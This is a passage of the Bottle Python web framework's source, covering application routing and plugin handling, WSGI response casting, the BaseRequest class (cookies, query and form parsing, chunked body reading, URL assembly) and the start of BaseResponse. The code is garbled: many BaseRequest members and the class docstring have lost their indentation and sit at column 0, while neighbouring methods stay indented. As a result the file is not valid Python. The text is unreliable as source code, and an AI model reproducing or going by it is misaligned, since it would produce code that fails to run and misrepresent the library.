        options.setdefault('mountpoint', {'prefix': prefix, 'target': app})
        options['callback'] = mountpoint_wrapper
        self.route('/%s/<:re:.*>' % '/'.join(segments), **options)
        if not prefix.endswith('/'):
            self.route('/' + '/'.join(segments), **options)
    def merge(self, routes):
        ''' Merge the routes of another :class:`Bottle` application or a list of
            :class:`Route` objects into this application. The routes keep their
            'owner', meaning that the :data:`Route.app` attribute is not
            changed. '''
        if isinstance(routes, Bottle):
            routes = routes.routes
        for route in routes:
            self.add_route(route)
    def install(self, plugin):
        ''' Add a plugin to the list of plugins and prepare it for being
            applied to all routes of this application. A plugin may be a simple
            decorator or an object that implements the :class:`Plugin` API.
        '''
        if hasattr(plugin, 'setup'): plugin.setup(self)
        if not callable(plugin) and not hasattr(plugin, 'apply'):
            raise TypeError("Plugins must be callable or implement .apply()")
        self.plugins.append(plugin)
        self.reset()
        return plugin
    def uninstall(self, plugin):
        ''' Uninstall plugins. Pass an instance to remove a specific plugin, a type
            object to remove all plugins that match that type, a string to remove
            all plugins with a matching ``name`` attribute or ``True`` to remove all
            plugins. Return the list of removed plugins. '''
        removed, remove = [], plugin
        for i, plugin in list(enumerate(self.plugins))[::-1]:
            if remove is True or remove is plugin or remove is type(plugin) \
            or getattr(plugin, 'name', True) == remove:
                removed.append(plugin)
                del self.plugins[i]
                if hasattr(plugin, 'close'): plugin.close()
        if removed: self.reset()
        return removed
    def reset(self, route=None):
        ''' Reset all routes (force plugins to be re-applied) and clear all
            caches. If an ID or route object is given, only that specific route
            is affected. '''
        if route is None: routes = self.routes
        elif isinstance(route, Route): routes = [route]
        else: routes = [self.routes[route]]
        for route in routes: route.reset()
        if DEBUG:
            for route in routes: route.prepare()
        self.trigger_hook('app_reset')
    def close(self):
        ''' Close the application and all installed plugins. '''
        for plugin in self.plugins:
            if hasattr(plugin, 'close'): plugin.close()
        # NOTE(review): self.stopped is only ever written here; no reader
        # is visible in this chunk.
        self.stopped = True
    def run(self, **kwargs):
        ''' Calls :func:`run` with the same parameters. '''
        run(self, **kwargs)
    def match(self, environ):
        """ Search for a matching route and return a (:class:`Route` , urlargs)
            tuple. The second value is a dictionary with parameters extracted
            from the URL. Raise :exc:`HTTPError` (404/405) on a non-match."""
        return self.router.match(environ)
    def get_url(self, routename, **kargs):
        """ Return a string that matches a named route """
        scriptname = request.environ.get('SCRIPT_NAME', '').strip('/') + '/'
        location = self.router.build(routename, **kargs).lstrip('/')
        return urljoin(urljoin('/', scriptname), location)
    def add_route(self, route):
        ''' Add a route object, but do not change the :data:`Route.app`
            attribute.'''
        self.routes.append(route)
        self.router.add(route.rule, route.method, route, name=route.name)
        if DEBUG: route.prepare()
    def route(self, path=None, method='GET', callback=None, name=None,
              apply=None, skip=None, **config):
        """ A decorator to bind a function to a request URL. Example::
                @app.route('/hello/:name')
                def hello(name):
                    return 'Hello %s' % name
            The ``:name`` part is a wildcard. See :class:`Router` for syntax
            details.
            :param path: Request path or a list of paths to listen to. If no
              path is specified, it is automatically generated from the
              signature of the function.
            :param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of
              methods to listen to. (default: `GET`)
            :param callback: An optional shortcut to avoid the decorator
              syntax. ``route(..., callback=func)`` equals ``route(...)(func)``
            :param name: The name for this route. (default: None)
            :param apply: A decorator or plugin or a list of plugins. These are
              applied to the route callback in addition to installed plugins.
            :param skip: A list of plugins, plugin classes or names. Matching
              plugins are not installed to this route. ``True`` skips all.
            Any additional keyword arguments are stored as route-specific
            configuration and passed to plugins (see :meth:`Plugin.apply`).
        """
        # Support bare decorator usage: @app.route
        if callable(path): path, callback = None, path
        plugins = makelist(apply)
        skiplist = makelist(skip)
        def decorator(callback):
            # TODO: Documentation and tests
            if isinstance(callback, basestring): callback = load(callback)
            for rule in makelist(path) or yieldroutes(callback):
                for verb in makelist(method):
                    verb = verb.upper()
                    route = Route(self, rule, verb, callback, name=name,
                                  plugins=plugins, skiplist=skiplist, **config)
                    self.add_route(route)
            return callback
        return decorator(callback) if callback else decorator
    def get(self, path=None, method='GET', **options):
        """ Equals :meth:`route`. """
        return self.route(path, method, **options)
    def post(self, path=None, method='POST', **options):
        """ Equals :meth:`route` with a ``POST`` method parameter. """
        return self.route(path, method, **options)
    def put(self, path=None, method='PUT', **options):
        """ Equals :meth:`route` with a ``PUT`` method parameter. """
        return self.route(path, method, **options)
    def delete(self, path=None, method='DELETE', **options):
        """ Equals :meth:`route` with a ``DELETE`` method parameter. """
        return self.route(path, method, **options)
    def error(self, code=500):
        """ Decorator: Register an output handler for a HTTP error code"""
        def wrapper(handler):
            self.error_handler[int(code)] = handler
            return handler
        return wrapper
    def default_error_handler(self, res):
        # Fallback used when no handler is registered for the status code.
        return tob(template(ERROR_PAGE_TEMPLATE, e=res))
    def _handle(self, environ):
        path = environ['bottle.raw_path'] = environ['PATH_INFO']
        if py3k:
            try:
                # PEP 3333: environ strings arrive latin1-decoded;
                # re-interpret the raw bytes as UTF-8.
                environ['PATH_INFO'] = path.encode('latin1').decode('utf8')
            except UnicodeError:
                return HTTPError(400, 'Invalid path string. Expected UTF-8')
        try:
            environ['bottle.app'] = self
            request.bind(environ)
            response.bind()
            try:
                self.trigger_hook('before_request')
                route, args = self.router.match(environ)
                environ['route.handle'] = route
                environ['bottle.route'] = route
                environ['route.url_args'] = args
                return route.call(**args)
            finally:
                self.trigger_hook('after_request')
        except HTTPResponse:
            return _e()
        except RouteReset:
            route.reset()
            return self._handle(environ)
        except (KeyboardInterrupt, SystemExit, MemoryError):
            raise
        except Exception:
            if not self.catchall: raise
            stacktrace = format_exc()
            environ['wsgi.errors'].write(stacktrace)
            return HTTPError(500, "Internal Server Error", _e(), stacktrace)
    def _cast(self, out, peek=None):
        """ Try to convert the parameter into something WSGI compatible and set
        correct HTTP headers when possible.
        Support: False, str, unicode, dict, HTTPResponse, HTTPError, file-like,
        iterable of strings and iterable of unicodes
        """
        # Empty output is done here
        if not out:
            if 'Content-Length' not in response:
                response['Content-Length'] = 0
            return []
        # Join lists of byte or unicode strings. Mixed lists are NOT supported
        if isinstance(out, (tuple, list))\
        and isinstance(out[0], (bytes, unicode)):
            out = out[0][0:0].join(out) # b'abc'[0:0] -> b''
        # Encode unicode strings
        if isinstance(out, unicode):
            out = out.encode(response.charset)
        # Byte Strings are just returned
        if isinstance(out, bytes):
            if 'Content-Length' not in response:
                response['Content-Length'] = len(out)
            return [out]
        # HTTPError or HTTPException (recursive, because they may wrap anything)
        # TODO: Handle these explicitly in handle() or make them iterable.
        if isinstance(out, HTTPError):
            out.apply(response)
            out = self.error_handler.get(out.status_code, self.default_error_handler)(out)
            return self._cast(out)
        if isinstance(out, HTTPResponse):
            out.apply(response)
            return self._cast(out.body)
        # File-like objects.
        if hasattr(out, 'read'):
            if 'wsgi.file_wrapper' in request.environ:
                return request.environ['wsgi.file_wrapper'](out)
            elif hasattr(out, 'close') or not hasattr(out, '__iter__'):
                return WSGIFileWrapper(out)
        # Handle Iterables. We peek into them to detect their inner type.
        try:
            iout = iter(out)
            first = next(iout)
            while not first:
                first = next(iout)
        except StopIteration:
            return self._cast('')
        except HTTPResponse:
            first = _e()
        except (KeyboardInterrupt, SystemExit, MemoryError):
            raise
        except Exception:
            if not self.catchall: raise
            first = HTTPError(500, 'Unhandled exception', _e(), format_exc())
        # These are the inner types allowed in iterator or generator objects.
        if isinstance(first, HTTPResponse):
            return self._cast(first)
        elif isinstance(first, bytes):
            new_iter = itertools.chain([first], iout)
        elif isinstance(first, unicode):
            encoder = lambda x: x.encode(response.charset)
            new_iter = imap(encoder, itertools.chain([first], iout))
        else:
            msg = 'Unsupported response type: %s' % type(first)
            return self._cast(HTTPError(500, msg))
        if hasattr(out, 'close'):
            new_iter = _closeiter(new_iter, out.close)
        return new_iter
    def wsgi(self, environ, start_response):
        """ The bottle WSGI-interface. """
        try:
            out = self._cast(self._handle(environ))
            # rfc2616 section 4.3
            if response._status_code in (100, 101, 204, 304)\
            or environ['REQUEST_METHOD'] == 'HEAD':
                if hasattr(out, 'close'): out.close()
                out = []
            start_response(response._status_line, response.headerlist)
            return out
        except (KeyboardInterrupt, SystemExit, MemoryError):
            raise
        except Exception:
            if not self.catchall: raise
            err = '<h1>Critical error while processing request: %s</h1>' \
                  % html_escape(environ.get('PATH_INFO', '/'))
            if DEBUG:
                err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \
                       '<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \
                       % (html_escape(repr(_e())), html_escape(format_exc()))
            environ['wsgi.errors'].write(err)
            headers = [('Content-Type', 'text/html; charset=UTF-8')]
            start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info())
            return [tob(err)]
    def __call__(self, environ, start_response):
        ''' Each instance of :class:'Bottle' is a WSGI application. '''
        return self.wsgi(environ, start_response)
    def __enter__(self):
        ''' Use this application as default for all module-level shortcuts. '''
        default_app.push(self)
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        default_app.pop()
###############################################################################
# HTTP and WSGI Tools ##########################################################
###############################################################################
class BaseRequest(object):
""" A wrapper for WSGI environment dictionaries that adds a lot of
convenient access methods and properties. Most of them are read-only.
Adding new attributes to a request actually adds them to the environ
dictionary (as 'bottle.request.ext.<name>'). This is the recommended
way to store and access request-specific data.
"""
__slots__ = ('environ')
#: Maximum size of memory buffer for :attr:`body` in bytes.
MEMFILE_MAX = 102400
def __init__(self, environ=None):
""" Wrap a WSGI environ dictionary. """
#: The wrapped WSGI environ dictionary. This is the only real attribute.
#: All other attributes actually are read-only properties.
self.environ = {} if environ is None else environ
self.environ['bottle.request'] = self
    @DictProperty('environ', 'bottle.app', read_only=True)
    def app(self):
        ''' Bottle application handling this request. '''
        # Only reached if 'bottle.app' was never stored in the environ;
        # Bottle._handle() injects it before dispatching.
        raise RuntimeError('This request is not connected to an application.')
    @DictProperty('environ', 'bottle.route', read_only=True)
    def route(self):
        """ The bottle :class:`Route` object that matches this request. """
        # Only reached if routing never happened; Bottle._handle() stores
        # 'bottle.route' in the environ after a successful match.
        raise RuntimeError('This request is not connected to a route.')
    @DictProperty('environ', 'route.url_args', read_only=True)
    def url_args(self):
        """ The arguments extracted from the URL. """
        # Only reached if routing never happened; Bottle._handle() stores
        # 'route.url_args' in the environ after a successful match.
        raise RuntimeError('This request is not connected to a route.')
@property
def path(self):
''' The value of ``PATH_INFO`` with exactly one prefixed slash (to fix
broken clients and avoid the "empty path" edge case). '''
return '/' + self.environ.get('PATH_INFO','').lstrip('/')
@property
def method(self):
''' The ``REQUEST_METHOD`` value as an uppercase string. '''
return self.environ.get('REQUEST_METHOD', 'GET').upper()
    @DictProperty('environ', 'bottle.request.headers', read_only=True)
    def headers(self):
        ''' A :class:`WSGIHeaderDict` that provides case-insensitive access to
            HTTP request headers. Built once per request and cached in the
            environ by :class:`DictProperty`. '''
        return WSGIHeaderDict(self.environ)
    def get_header(self, name, default=None):
        ''' Return the value of a request header, or a given default value.

            :param name: Header name (case-insensitive, see :attr:`headers`).
            :param default: Value returned if the header is missing. '''
        return self.headers.get(name, default)
@DictProperty('environ', 'bottle.request.cookies', read_only=True)
def cookies(self):
""" Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT
decoded. Use :meth:`get_cookie` if you expect signed cookies. """
cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')).values()
return FormsDict((c.key, c.value) for c in cookies)
def get_cookie(self, key, default=None, secret=None):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret and value:
dec = cookie_decode(value, secret) # (key, value) tuple or None
return dec[1] if dec and dec[0] == key else default
return value or default
@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
''' The :attr:`query_string` parsed into a :class:`FormsDict`. These
values are sometimes called "URL arguments" or "GET parameters", but
not to be confused with "URL wildcards" as they are provided by the
:class:`Router`. '''
get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
''' If the ``Content-Type`` header is ``application/json``, this
property holds the parsed content of the request body. Only requests
smaller than :attr:`MEMFILE_MAX` are processed to avoid memory
exhaustion. '''
if 'application/json' in self.environ.get('CONTENT_TYPE', ''):
return json_loads(self._get_body_string())
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
    def _iter_chunked(self, read, bufsize):
        # Incrementally decode an HTTP/1.1 chunked transfer-encoded body.
        # Any protocol violation is reported as a 400 error.
        err = HTTPError(400, 'Error while parsing chunked transfer body.')
        rn, sem, bs = tob('\r\n'), tob(';'), tob('')
        while True:
            header = read(1)
            # Read byte-wise until the CRLF that terminates the chunk header.
            while header[-2:] != rn:
                c = read(1)
                header += c
                if not c: raise err
                if len(header) > bufsize: raise err
            # The hexadecimal chunk size may be followed by ';' and extensions.
            size, sep, junk = header.partition(sem)
            try:
                maxread = int(tonat(size.strip()), 16)
            except ValueError:
                raise err
            if maxread == 0: break  # a zero-sized chunk terminates the body
            buffer = bs
            while maxread > 0:
                if not buffer:
                    buffer = read(min(maxread, bufsize))
                part, buffer = buffer[:maxread], buffer[maxread:]
                if not part: raise err
                yield part
                maxread -= len(part)
            # Each chunk payload is terminated by CRLF as well.
            if read(2) != rn:
                raise err
    @DictProperty('environ', 'bottle.request.body', read_only=True)
    def _body(self):
        # Read the whole request body into a buffer. Small bodies stay in
        # memory (BytesIO); anything above MEMFILE_MAX is spooled to a
        # temporary file.
        body_iter = self._iter_chunked if self.chunked else self._iter_body
        read_func = self.environ['wsgi.input'].read
        body, body_size, is_temp_file = BytesIO(), 0, False
        for part in body_iter(read_func, self.MEMFILE_MAX):
            body.write(part)
            body_size += len(part)
            if not is_temp_file and body_size > self.MEMFILE_MAX:
                body, tmp = TemporaryFile(mode='w+b'), body
                body.write(tmp.getvalue())
                del tmp
                is_temp_file = True
        # Replace wsgi.input with the buffer so the body can be re-read.
        self.environ['wsgi.input'] = body
        body.seek(0)
        return body
def _get_body_string(self):
''' read body until content-length or MEMFILE_MAX into a string. Raise
HTTPError(413) on requests that are to large. '''
clen = self.content_length
if clen > self.MEMFILE_MAX:
raise HTTPError(413, 'Request to large')
if clen < 0: clen = self.MEMFILE_MAX + 1
data = self.body.read(clen)
if len(data) > self.MEMFILE_MAX: # Fail fast
raise HTTPError(413, 'Request to large')
return data
    @property
    def body(self):
        """ The HTTP request body as a seek-able file-like object. Depending on
            :attr:`MEMFILE_MAX`, this is either a temporary file or a
            :class:`io.BytesIO` instance. Accessing this property for the first
            time reads and replaces the ``wsgi.input`` environ variable.
            Subsequent accesses just do a `seek(0)` on the file object. """
        # _body is cached in the environ by DictProperty; rewind for re-reads.
        self._body.seek(0)
        return self._body
    @property
    def chunked(self):
        ''' True if Chunked transfer encoding was used for the request body. '''
        return 'chunked' in self.environ.get('HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
    @DictProperty('environ', 'bottle.request.post', read_only=True)
    def POST(self):
        """ The values of :attr:`forms` and :attr:`files` combined into a single
            :class:`FormsDict`. Values are either strings (form values) or
            instances of :class:`cgi.FieldStorage` (file uploads).
        """
        post = FormsDict()
        # We default to application/x-www-form-urlencoded for everything that
        # is not multipart and take the fast path (also: 3.1 workaround)
        if not self.content_type.startswith('multipart/'):
            # Bytes are decoded as latin1 so nothing is lost; FormsDict
            # re-decodes on attribute access.
            pairs = _parse_qsl(tonat(self._get_body_string(), 'latin1'))
            for key, value in pairs:
                post[key] = value
            return post
        safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi
        for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
            if key in self.environ: safe_env[key] = self.environ[key]
        args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
        if py31:
            # Python 3.1 needs a text stream without newline translation.
            args['fp'] = NCTextIOWrapper(args['fp'], encoding='utf8',
                                         newline='\n')
        elif py3k:
            args['encoding'] = 'utf8'
        data = cgi.FieldStorage(**args)
        data = data.list or []
        for item in data:
            # Items with a filename are uploads; everything else is a field.
            if item.filename:
                post[item.name] = FileUpload(item.file, item.name,
                                             item.filename, item.headers)
            else:
                post[item.name] = item.value
        return post
    @property
    def url(self):
        """ The full request URI including hostname and scheme. If your app
            lives behind a reverse proxy or load balancer and you get confusing
            results, make sure that the ``X-Forwarded-Host`` header is set
            correctly. """
        # Built from the cached :attr:`urlparts` SplitResult.
        return self.urlparts.geturl()
    @DictProperty('environ', 'bottle.request.urlparts', read_only=True)
    def urlparts(self):
        ''' The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
            The tuple contains (scheme, host, path, query_string and fragment),
            but the fragment is always empty because it is not visible to the
            server. '''
        env = self.environ
        # Prefer X-Forwarded-* headers (set by reverse proxies) over the
        # plain WSGI values.
        http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http')
        host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
        if not host:
            # HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
            host = env.get('SERVER_NAME', '127.0.0.1')
            port = env.get('SERVER_PORT')
            # Only append the port if it is not the scheme's default one.
            if port and port != ('80' if http == 'http' else '443'):
                host += ':' + port
        path = urlquote(self.fullpath)
        return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
    @property
    def query_string(self):
        """ The raw :attr:`query` part of the URL (everything in between ``?``
            and ``#``) as a string. """
        # Still url-encoded; use :attr:`query` for the parsed values.
        return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
''' The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
called. This script path is returned with leading and tailing
slashes. '''
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
    def path_shift(self, shift=1):
        ''' Shift path segments from :attr:`path` to :attr:`script_name` and
            vice versa.
            :param shift: The number of path segments to shift. May be negative
              to change the shift direction. (default: 1)
        '''
        script = self.environ.get('SCRIPT_NAME','/')
        # Delegates to the module-level path_shift() helper. Assigning via
        # self[...] also invalidates dependent caches (see __setitem__).
        self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift)
@property
def content_length(self):
''' The request body length as an integer. The client is responsible to
set this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. '''
return int(self.environ.get('CONTENT_LENGTH') or -1)
    @property
    def content_type(self):
        ''' The Content-Type header as a lowercase-string (default: empty). '''
        return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
''' True if the request was triggered by a XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). '''
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','')
return requested_with.lower() == 'xmlhttprequest'
    @property
    def is_ajax(self):
        ''' Alias for :attr:`is_xhr`. "Ajax" is not the right term. '''
        return self.is_xhr
    @property
    def auth(self):
        """ HTTP authentication data as a (user, password) tuple. This
            implementation currently supports basic (not digest) authentication
            only. If the authentication happened at a higher level (e.g. in the
            front web-server or a middleware), the password field is None, but
            the user field is looked up from the ``REMOTE_USER`` environ
            variable. On any errors, None is returned. """
        basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION',''))
        if basic: return basic
        # Fall back to REMOTE_USER set by an upstream authenticator.
        ruser = self.environ.get('REMOTE_USER')
        if ruser: return (ruser, None)
        return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
the client IP and followed by zero or more proxies. This does only
work if all proxies support the ```X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
return route[0] if route else None
    def copy(self):
        """ Return a new :class:`Request` with a shallow :attr:`environ` copy. """
        # Shallow: the environ dict is copied, its values are shared.
        return Request(self.environ.copy())
def get(self, value, default=None): return self.environ.get(value, default)
def __getitem__(self, key): return self.environ[key]
def __delitem__(self, key): self[key] = ""; del(self.environ[key])
def __iter__(self): return iter(self.environ)
def __len__(self): return len(self.environ)
def keys(self): return self.environ.keys()
    def __setitem__(self, key, value):
        """ Change an environ value and clear all caches that depend on it. """
        if self.environ.get('bottle.request.readonly'):
            raise KeyError('The environ dictionary is read-only.')
        self.environ[key] = value
        todelete = ()
        if key == 'wsgi.input':
            # A new body invalidates everything parsed from the old one.
            todelete = ('body', 'forms', 'files', 'params', 'post', 'json')
        elif key == 'QUERY_STRING':
            todelete = ('query', 'params')
        elif key.startswith('HTTP_'):
            todelete = ('headers', 'cookies')
        # Cached values live in the environ under a 'bottle.request.' prefix.
        for key in todelete:
            self.environ.pop('bottle.request.'+key, None)
    def __repr__(self):
        ''' E.g. ``<BaseRequest: GET http://example.com/>``. '''
        return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url)
    def __getattr__(self, name):
        ''' Search in self.environ for additional user defined attributes. '''
        try:
            var = self.environ['bottle.request.ext.%s'%name]
            # Extensions may be descriptors (e.g. properties); honor __get__.
            return var.__get__(self) if hasattr(var, '__get__') else var
        except KeyError:
            raise AttributeError('Attribute %r not defined.' % name)
    def __setattr__(self, name, value):
        # 'environ' is the only real instance attribute; anything else is
        # stored inside the environ as a request extension.
        if name == 'environ': return object.__setattr__(self, name, value)
        self.environ['bottle.request.ext.%s'%name] = value
def _hkey(s):
return s.title().replace('_','-')
class HeaderProperty(object):
    ''' Descriptor that maps attribute access to a single entry in the
        owner's ``headers`` dict, with optional value conversion on read
        (`reader`) and write (`writer`). '''
    def __init__(self, name, reader=None, writer=str, default=''):
        self.name, self.default = name, default
        self.reader, self.writer = reader, writer
        self.__doc__ = 'Current value of the %r header.' % name.title()

    def __get__(self, obj, cls):
        if obj is None:
            return self  # class-level access returns the descriptor itself
        raw = obj.headers.get(self.name, self.default)
        if self.reader:
            return self.reader(raw)
        return raw

    def __set__(self, obj, value):
        obj.headers[self.name] = self.writer(value)

    def __delete__(self, obj):
        del obj.headers[self.name]
class BaseResponse(object):
    """ Storage class for a response body as well as headers and cookies.
        This class does support dict-like case-insensitive item-access to
        headers, but is NOT a dict. Most notably, iterating over a response
        yields parts of the body and not the headers.
        :param body: The response body as one of the supported types.
        :param status: Either an HTTP status code (e.g. 200) or a status line
                       including the reason phrase (e.g. '200 OK').
        :param headers: A dictionary or a list of name-value pairs.
        Additional keyword arguments are added to the list of headers.
        Underscores in the header name are replaced with dashes.
    """
    default_status = 200
    default_content_type = 'text/html; charset=UTF-8'
    # Header blacklist for specific response codes
    # (rfc2616 section 10.2.3 and 10.3.5)
    bad_headers = {
        204: set(('Content-Type',)),
        304: set(('Allow', 'Content-Encoding', 'Content-Language',
                  'Content-Length', 'Content-Range', 'Content-Type',
                  'Content-Md5', 'Last-Modified'))}

    def __init__(self, body='', status=None, headers=None, **more_headers):
        self._cookies = None
        self._headers = {}
        self.body = body
        self.status = status or self.default_status
        if headers:
            if isinstance(headers, dict):
                headers = headers.items()
            for name, value in headers:
                self.add_header(name, value)
        if more_headers:
            for name, value in more_headers.items():
                self.add_header(name, value)

    def copy(self, cls=None):
        ''' Returns a copy of self. '''
        cls = cls or BaseResponse
        assert issubclass(cls, BaseResponse)
        copy = cls()
        copy.status = self.status
        # Copy the per-header value lists too, so the copy can be modified
        # independently (add_header mutates these lists in place).
        copy._headers = dict((k, v[:]) for (k, v) in self._headers.items())
        if self._cookies:
            copy._cookies = SimpleCookie()
            copy._cookies.load(self._cookies.output())
        return copy

    def __iter__(self):
        # Iterating a response yields body parts, not headers.
        return iter(self.body)

    def close(self):
        if hasattr(self.body, 'close'):
            self.body.close()

    @property
    def status_line(self):
        ''' The HTTP status line as a string (e.g. ``404 Not Found``).'''
        return self._status_line

    @property
    def status_code(self):
        ''' The HTTP status code as an integer (e.g. 404).'''
        return self._status_code

    def _set_status(self, status):
        if isinstance(status, int):
            code, status = status, _HTTP_STATUS_LINES.get(status)
        elif ' ' in status:
            status = status.strip()
            code = int(status.split()[0])
        else:
            raise ValueError('String status line without a reason phrase.')
        if not 100 <= code <= 999: raise ValueError('Status code out of range.')
        self._status_code = code
        self._status_line = str(status or ('%d Unknown' % code))

    def _get_status(self):
        return self._status_line

    status = property(_get_status, _set_status, None,
        ''' A writeable property to change the HTTP response status. It accepts
            either a numeric code (100-999) or a string with a custom reason
            phrase (e.g. "404 Brain not found"). Both :data:`status_line` and
            :data:`status_code` are updated accordingly. The return value is
            always a status string. ''')
    del _get_status, _set_status

    @property
    def headers(self):
        ''' An instance of :class:`HeaderDict`, a case-insensitive dict-like
            view on the response headers. '''
        hdict = HeaderDict()
        hdict.dict = self._headers  # share storage; the view is live
        return hdict

    def __contains__(self, name): return _hkey(name) in self._headers
    def __delitem__(self, name): del self._headers[_hkey(name)]
    def __getitem__(self, name): return self._headers[_hkey(name)][-1]
    def __setitem__(self, name, value): self._headers[_hkey(name)] = [str(value)]

    def get_header(self, name, default=None):
        ''' Return the value of a previously defined header. If there is no
            header with that name, return a default value. '''
        return self._headers.get(_hkey(name), [default])[-1]

    def set_header(self, name, value):
        ''' Create a new response header, replacing any previously defined
            headers with the same name. '''
        self._headers[_hkey(name)] = [str(value)]

    def add_header(self, name, value):
        ''' Add an additional response header, not removing duplicates. '''
        self._headers.setdefault(_hkey(name), []).append(str(value))

    def iter_headers(self):
        ''' Yield (header, value) tuples, skipping headers that are not
            allowed with the current response status code. '''
        return self.headerlist

    @property
    def headerlist(self):
        ''' WSGI conform list of (header, value) tuples. '''
        out = []
        headers = list(self._headers.items())
        if 'Content-Type' not in self._headers:
            headers.append(('Content-Type', [self.default_content_type]))
        # Drop headers that are forbidden for this status code
        # (see :attr:`bad_headers`).
        if self._status_code in self.bad_headers:
            bad_headers = self.bad_headers[self._status_code]
            headers = [h for h in headers if h[0] not in bad_headers]
        out += [(name, val) for name, vals in headers for val in vals]
        if self._cookies:
            for c in self._cookies.values():
                out.append(('Set-Cookie', c.OutputString()))
        return out

    content_type = HeaderProperty('Content-Type')
    content_length = HeaderProperty('Content-Length', reader=int)
    expires = HeaderProperty('Expires',
        reader=lambda x: datetime.utcfromtimestamp(parse_date(x)),
        writer=lambda x: http_date(x))

    @property
    def charset(self, default='UTF-8'):
        """ Return the charset specified in the content-type header (default: utf8). """
        # NOTE: `default` always keeps its default value here, because
        # property getters are only ever called with `self`.
        if 'charset=' in self.content_type:
            return self.content_type.split('charset=')[-1].split(';')[0].strip()
        return default

    def set_cookie(self, name, value, secret=None, **options):
        ''' Create a new cookie or replace an old one. If the `secret` parameter is
            set, create a `Signed Cookie` (described below).
            :param name: the name of the cookie.
            :param value: the value of the cookie.
            :param secret: a signature key required for signed cookies.
            Additionally, this method accepts all RFC 2109 attributes that are
            supported by :class:`cookie.Morsel`, including:
            :param max_age: maximum age in seconds. (default: None)
            :param expires: a datetime object or UNIX timestamp. (default: None)
            :param domain: the domain that is allowed to read the cookie.
              (default: current domain)
            :param path: limits the cookie to a given path (default: current path)
            :param secure: limit the cookie to HTTPS connections (default: off).
            :param httponly: prevents client-side javascript to read this cookie
              (default: off, requires Python 2.6 or newer).
            If neither `expires` nor `max_age` is set (default), the cookie will
            expire at the end of the browser session (as soon as the browser
            window is closed).
            Signed cookies may store any pickle-able object and are
            cryptographically signed to prevent manipulation. Keep in mind that
            cookies are limited to 4kb in most browsers.
            Warning: Signed cookies are not encrypted (the client can still see
            the content) and not copy-protected (the client can restore an old
            cookie). The main intention is to make pickling and unpickling
            save, not to store secret information at client side.
        '''
        if not self._cookies:
            self._cookies = SimpleCookie()
        if secret:
            value = touni(cookie_encode((name, value), secret))
        elif not isinstance(value, basestring):
            raise TypeError('Secret key missing for non-string Cookie.')
        # Most browsers cap cookies at about 4kb.
        if len(value) > 4096: raise ValueError('Cookie value too long.')
        self._cookies[name] = value
        for key, value in options.items():
            if key == 'max_age':
                if isinstance(value, timedelta):
                    value = value.seconds + value.days * 24 * 3600
            if key == 'expires':
                # Normalize datetime/date or UNIX timestamps to the
                # RFC 1123 date format expected by browsers.
                if isinstance(value, (datedate, datetime)):
                    value = value.timetuple()
                elif isinstance(value, (int, float)):
                    value = time.gmtime(value)
                value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
            self._cookies[name][key.replace('_', '-')] = value

